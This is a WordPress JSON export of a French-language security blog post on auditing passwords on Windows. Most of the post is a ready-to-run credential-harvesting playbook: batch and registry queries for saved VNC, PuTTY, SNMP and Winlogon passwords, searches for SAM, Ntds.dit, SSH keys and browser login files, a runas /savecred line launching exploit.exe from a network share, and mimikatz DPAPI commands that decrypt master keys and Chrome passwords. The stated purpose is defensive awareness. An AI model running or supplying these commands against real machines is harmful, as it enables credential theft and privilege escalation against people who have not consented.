{"id":306,"date":"2021-05-29T10:35:41","date_gmt":"2021-05-29T15:35:41","guid":{"rendered":"https:\/\/www.searchevolution.com\/security\/?p=306"},"modified":"2021-05-30T04:41:57","modified_gmt":"2021-05-30T09:41:57","slug":"faire-un-audit-des-mots-de-passe-sur-windows","status":"publish","type":"post","link":"https:\/\/www.searchevolution.com\/security\/2021\/05\/29\/faire-un-audit-des-mots-de-passe-sur-windows\/","title":{"rendered":"Faire un audit des mots de passe sur Windows"},"content":{"rendered":"<p>Il est important de savoir ce qu&#8217;un attaquant pourrait retrouver sur votre poste de travail advenant le cas d&#8217;un intrusion r\u00e9ussi. Les mots de passe sont la plupart du temps encrypt\u00e9s, mais si ceux-ci sont trop courts, facilement devinables ou bas\u00e9s sur un mot de passe d&#8217;un dictionnaire, un attaquant saura en tirer partie. Un mot de passe peut permettre d&#8217;acc\u00e9der \u00e0 d&#8217;autres services et obtenir davantage d&#8217;informations sur votre entreprise. Voici quelques scripts pour vous donner une id\u00e9e de ce qu&#8217;une personne malveillante retrouvera sur votre ordinateur.<\/p>\n<p><pre><code>\nECHO.Recherche dans des cl\u00e9s de registre sp\u00e9cifiques pour retrouver des identifiants de connectins\n\nreg query HKCU\\Software\\ORL\\WinVNC3\\Password 2&gt;nul\n\nECHO.Recherche pour des identifiants VNC\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4 \/v password 2&gt;nul\n\nECHO.Identifiants de connexion sur un domaine en cache\nreg query &quot;HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon&quot; 2&gt;nul | findstr \/i &quot;DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername&quot;\n\nECHO.Identifiants SNMP\nreg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\SNMP \/s 2&gt;nul\n\nECHO.Identifiants pour le logiciel TightVNC\nreg query HKCU\\Software\\TightVNC\\Server 2&gt;nul\n\nECHO.Identiants du logiciel Putty enregistr\u00e9s\nreg query HKCU\\Software\\SimonTatham\\PuTTY\\Sessions \/s 2&gt;nul\n\nECHO.Cl\u00e9s SSH\nreg query HKCU\\Software\\OpenSSH\\Agent\\Keys \/s 2&gt;nul\n\nECHO.Recherche de fichiers avec une partie du nom s&#039;appelant password ou credential\ncd %USERPROFILE% 2&gt;nul &amp;&amp; dir \/s\/b *password* == *credential* 2&gt;nul\n\nECHO.Recherche des fichiers de divers logiciels contenant des informations de connexion (git, sudo, sqlite,KeePass, VNC, Elasticsearch, GPG, Docker, ssh)\ncd ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\ndir \/s\/b \/A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == &quot;Login Data&quot; == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2&gt;nul | findstr \/v &quot;.dll&quot;\ncd inetpub 2&gt;nul &amp;&amp; (dir \/s\/b web.config == *.log &amp; cd ..)\nECHO.\n\n<\/code><\/pre><\/p>\n<p>Et pour une analyse approfondie, vous pouvez faire la recherche dans le contenu des fichiers et dans le nom des cl\u00e9s de registre du mot password ou pwd<br \/>\n<pre><code>\n\nreg query HKLM \/f passw \/t REG_SZ \/s\nreg query HKCU \/f passw \/t REG_SZ \/s\nreg query HKLM \/f pwd \/t REG_SZ \/s\nreg query HKCU \/f pwd \/t REG_SZ \/s\n\n@ECHO OFF &amp; SETLOCAL EnableDelayedExpansion\nrem for \/f %%x in (&#039;wmic logicaldisk get name^| more&#039;) do (&nbsp;&nbsp; ----- Pour une recherche dans tous les lecteurs\nfor \/f %%x in (&quot;C:&quot;) do (\n&nbsp;&nbsp;set tdrive=%%x\n&nbsp;&nbsp;if &quot;!tdrive:~1,2!&quot; == &quot;:&quot; (\n&nbsp;&nbsp;&nbsp;&nbsp;%%x\n&nbsp;&nbsp;&nbsp;&nbsp;REM Recherche&nbsp;&nbsp;du mot password dans les fichiers ayant les extensons .xml, .ini, .txt, .cfg et .config\n&nbsp;&nbsp;&nbsp;&nbsp;findstr \/s\/n\/m\/i password *.xml *.ini *.txt *.cfg *.config 2&gt;nul | findstr \/v \/i &quot;\\\\AppData\\\\Local \\\\WinSxS ApnDatabase.xml \\\\UEV\\\\InboxTemplates \\\\Microsoft.Windows.Cloud \\\\Notepad\\+\\+\\\\ vmware cortana alphabet \\\\7-zip\\\\&quot; 2&gt;nul\n&nbsp;&nbsp;&nbsp;&nbsp;ECHO.\n&nbsp;&nbsp;&nbsp;&nbsp;REM Fichiers dont le nom contient le mot pass, cred ou .config pas dans le r\u00e9pertoire \\Windows\n&nbsp;&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;dir \/s\/b *pass* == *cred* == *.config* == *.cfg 2&gt;nul | findstr \/v \/i &quot;\\\\windows\\\\&quot;&nbsp;&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;ECHO.\n&nbsp;&nbsp; )\n)&lt;\/code\n\nGestionnaire de mots de passe (Permet aux usagers de se connecter imm\u00e9diatement). Liste d&#039;identifiants enregistr\u00e9s\n&lt;code&gt;\ncmdkey \/list\nrunas \/savecred \/user:WORKGROUP\\Administrator &quot;\\\\10.10.10.10\\partage\\exploit.exe&quot; #savedcred utilise l&#039;information de connection\n<\/code><\/pre><\/p>\n<p>Parfois l&#8217;information enregistr\u00e9 est encrypt\u00e9 avec DPAPI. DPAPI permet d&#8217;encoder une cl\u00e9 asym\u00e9trique (RSA souvent) en utilisant une cl\u00e9 sym\u00e9trique. Les cl\u00e9s sym\u00e9triques sont enregistr\u00e9s dans le r\u00e9pertoire %APPDATA%\\Microsoft\\Protect\\{SID}. SID est l&#8217;idenfiant de s\u00e9curit\u00e9 de l&#8217;usager (64 octets al\u00e9atoires). La cl\u00e9 DPAPI est enregistr\u00e9 dans le m\u00eame fichier que la cl\u00e9 ma\u00eetre qui prot\u00e8ge les cl\u00e9s priv\u00e9s de l&#8217;utilisateur. C&#8217;est impossible de lister ce r\u00e9pertoire. Vous devez utiliser powershell<br \/>\n<pre><code>\nGet-ChildItem&nbsp;&nbsp;C:\\Users\\USER\\AppData\\Roaming\\Microsoft\\Protect\\\nGet-ChildItem&nbsp;&nbsp;C:\\Users\\USER\\AppData\\Local\\Microsoft\\Protect\\\n<\/code><\/pre><\/p>\n<p>Il faut utiliser le module mimikatz dpapi::masterkey pour d\u00e9crypter la cl\u00e9. Si vous connaissez le mot de passe de l&#8217;utilisateur \u00e0 qui la cl\u00e9 ma\u00eetre appartient, vous pouvez acc\u00e9der au fichier de la cl\u00e9 ma\u00eetre, vous pouvez obtenir la cl\u00e9 ma\u00eetre. Vous verrez la cl\u00e9 extraite : key.<br \/>\n<pre><code>\ndpapi::masterkey \/in:&quot;C:\\Users\\spotless.OFFENSE\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2552734371-813931464-1050690807-1106\\3e90dd9e-f901-40a1-b691-84d7f647b8fe&quot; \/sid:S-1-5-21-2552734371-813931464-1050690807-1106 \/password:123456 \/protected\n<\/code><\/pre><\/p>\n<p>Les fichiers prot\u00e9g\u00e9s par le mot de passe ma\u00eetre sont localis\u00e9s dans<br \/>\n<pre><code>\ndir C:\\Users\\username\\AppData\\Local\\Microsoft\\Credentials\\\ndir C:\\Users\\username\\AppData\\Roaming\\Microsoft\\Credentials\\\nGet-ChildItem -Hidden C:\\Users\\username\\AppData\\Local\\Microsoft\\Credentials\\\nGet-ChildItem -Hidden C:\\Users\\username\\AppData\\Roaming\\Microsoft\\Credentials\\\n<\/code><\/pre><\/p>\n<p>DPAPI prot\u00e8ge les mots de passe et les donn\u00e9es pour les fonctionnalit\u00e9s qui permetteent le remplissage automatique des champs dans Google et Internet Explorer, les mots de passe de Outlook et Windows Mail, les mots de passe des partages, les cl\u00e9s de r\u00e9seau sans-fil, les cl\u00e9s de Windows Cardpace et Windows vault, les mots de passe de RDP, SSL\/TLS dans IIS et beaucoup d&#8217;autres.<\/p>\n<p>Vous pouvez utiliser mimikatz dpapi::cred avec la cl\u00e9 \/masterkey pour la d\u00e9cryption. Vous pouvez aussi extraire plusieurs cl\u00e9s ma\u00eetres DPAPI de la m\u00e9moire avec sekurlsa::dpapi (administrateur seulement)<\/p>\n<p><code>dpapi::cred \/in:C:\\path\\to\\encrypted\\file \/masterkey:&lt;MASTERKEY&gt;<\/code><\/p>\n<p>Extraire tous les cl\u00e9s ma\u00eetres backup du domaine<br \/>\n<pre><code>\nlsadump::backupkeys \/system:dc01.searchevolution.local \/export&nbsp;&nbsp;#besoin privil\u00e8ge de l&#039;administrateur du domaine. \ndpapi::masterkey \/in:&quot;C:\\Users\\germain.TEST\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2552734371-813931464-1050690807-1106\\3e90dd9e-f901-40a1-b691-84d7f647b8fe&quot; \/pvk:ntds_capi_0_d2685b31-402d-493b-8d12-5fe48ee26f5a.pvk\ndpapi::chrome \/in:&quot;c:\\users\\spotless.offense\\appdata\\local\\Google\\Chrome\\User Data\\Default\\Login Data&quot; \/masterkey:ffff13e344527c0ec4e016f419fe7457f2deaad500f68baf48b19eb0b8bc265a0669d6db2bddec7a557ee1d92bcb2f43fbf05c7aa87c7902453d5293d99adddd&nbsp;&nbsp; #d\u00e9cryption des donn\u00e9es de connexion encrypt\u00e9 de chrome de l&#039;utilisateur avec la cl\u00e9 obtenu de la commande pr\u00e9c\u00e9dente &quot;key&quot;\n<\/code><\/pre><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Il est important de savoir ce qu&#8217;un attaquant pourrait retrouver sur votre poste de travail advenant le cas d&#8217;un intrusion r\u00e9ussi. Les mots de passe sont la plupart du temps encrypt\u00e9s, mais si ceux-ci sont trop courts, facilement devinables ou bas\u00e9s sur un mot de passe d&#8217;un dictionnaire, un attaquant saura en tirer partie. Un mot de passe peut permettre d&#8217;acc\u00e9der \u00e0 d&#8217;autres services et obtenir davantage d&#8217;informations sur votre entreprise. Voici quelques scripts pour vous donner une id\u00e9e de ce qu&#8217;une personne malveillante retrouvera sur votre ordinateur. ECHO.Recherche dans des cl\u00e9s de registre sp\u00e9cifiques pour retrouver des identifiants de <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Faire un audit des mots de passe sur Windows - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/05\/29\/faire-un-audit-des-mots-de-passe-sur-windows\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Faire un audit des mots de passe sur Windows - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"Il est important de savoir ce qu&#8217;un attaquant pourrait retrouver sur votre poste de travail advenant le cas d&#8217;un intrusion r\u00e9ussi. Les mots de passe sont la plupart du temps encrypt\u00e9s, mais si ceux-ci sont trop courts, facilement devinables ou bas\u00e9s sur un mot de passe d&#8217;un dictionnaire, un attaquant saura en tirer partie. Un mot de passe peut permettre d&#8217;acc\u00e9der \u00e0 d&#8217;autres services et obtenir davantage d&#8217;informations sur votre entreprise. Voici quelques scripts pour vous donner une id\u00e9e de ce qu&#8217;une personne malveillante retrouvera sur votre ordinateur. ECHO.Recherche dans des cl\u00e9s de registre sp\u00e9cifiques pour retrouver des identifiants de\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/05\/29\/faire-un-audit-des-mots-de-passe-sur-windows\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-05-29T15:35:41+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-05-30T09:41:57+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/29\/faire-un-audit-des-mots-de-passe-sur-windows\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/29\/faire-un-audit-des-mots-de-passe-sur-windows\/\",\"name\":\"Faire un audit des mots de passe sur Windows - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-05-29T15:35:41+00:00\",\"dateModified\":\"2021-05-30T09:41:57+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/29\/faire-un-audit-des-mots-de-passe-sur-windows\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/05\/29\/faire-un-audit-des-mots-de-passe-sur-windows\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/29\/faire-un-audit-des-mots-de-passe-sur-windows\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Faire un audit des mots de passe sur Windows\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Faire un audit des mots de passe sur Windows - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/05\/29\/faire-un-audit-des-mots-de-passe-sur-windows\/","og_locale":"fr_CA","og_type":"article","og_title":"Faire un audit des mots de passe sur Windows - S\u00e9curiser votre site","og_description":"Il est important de savoir ce qu&#8217;un attaquant pourrait retrouver sur votre poste de travail advenant le cas d&#8217;un intrusion r\u00e9ussi. Les mots de passe sont la plupart du temps encrypt\u00e9s, mais si ceux-ci sont trop courts, facilement devinables ou bas\u00e9s sur un mot de passe d&#8217;un dictionnaire, un attaquant saura en tirer partie. Un mot de passe peut permettre d&#8217;acc\u00e9der \u00e0 d&#8217;autres services et obtenir davantage d&#8217;informations sur votre entreprise. Voici quelques scripts pour vous donner une id\u00e9e de ce qu&#8217;une personne malveillante retrouvera sur votre ordinateur. ECHO.Recherche dans des cl\u00e9s de registre sp\u00e9cifiques pour retrouver des identifiants de","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/05\/29\/faire-un-audit-des-mots-de-passe-sur-windows\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-05-29T15:35:41+00:00","article_modified_time":"2021-05-30T09:41:57+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/29\/faire-un-audit-des-mots-de-passe-sur-windows\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/05\/29\/faire-un-audit-des-mots-de-passe-sur-windows\/","name":"Faire un audit des mots de passe sur Windows - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-05-29T15:35:41+00:00","dateModified":"2021-05-30T09:41:57+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/29\/faire-un-audit-des-mots-de-passe-sur-windows\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/05\/29\/faire-un-audit-des-mots-de-passe-sur-windows\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/29\/faire-un-audit-des-mots-de-passe-sur-windows\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Faire un audit des mots de passe sur Windows"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/306"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=306"}],"version-history":[{"count":7,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/306\/revisions"}],"predecessor-version":[{"id":313,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/306\/revisions\/313"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=306"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=306"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=306"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}